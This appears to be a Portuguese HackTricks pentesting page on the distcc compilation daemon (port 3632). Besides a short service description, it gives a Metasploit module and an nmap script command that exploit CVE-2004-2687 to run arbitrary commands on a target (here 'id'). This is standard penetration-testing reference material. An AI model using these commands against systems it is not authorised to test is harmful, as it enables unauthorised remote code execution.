hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.3 KiB

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Informações Básicas

Distcc é projetado para acelerar a compilação aproveitando a capacidade de processamento não utilizada em outros computadores. Uma máquina com distcc instalado pode enviar código para ser compilado através da rede para um computador que tenha o daemon distccd e um compilador compatível instalado.

Porta padrão: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploração

Verifique se é vulnerável ao CVE-2004-2687 para executar código arbitrário:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Eu acho que o Shodan não detecta esse serviço.

Recursos

Post criado por Álex B (@r1p)

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: